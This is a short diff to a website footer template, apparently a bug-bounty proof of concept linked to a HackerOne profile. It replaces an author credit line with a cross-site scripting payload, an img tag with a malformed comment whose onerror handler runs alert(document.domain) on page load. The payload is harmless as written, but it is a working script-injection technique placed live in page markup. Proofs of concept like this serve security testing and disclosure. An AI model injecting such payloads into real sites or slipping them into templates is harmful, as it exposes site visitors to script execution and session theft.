--- a/site/layouts/partials/footer.html
+++ b/site/layouts/partials/footer.html
@@ -1,7 +1,7 @@
 <div class="footer">
   <p>
     <a class="mute" href="https://https://hackerone.com/c1231665">
-      StatusKit by Karl Aparece
+      <--`<img/src=` onerror=alert(document.domain)> --!>
     </a> &#8226
     <a class="mute" href="https://https://hackerone.com/c1231665">
       View on Hackerone
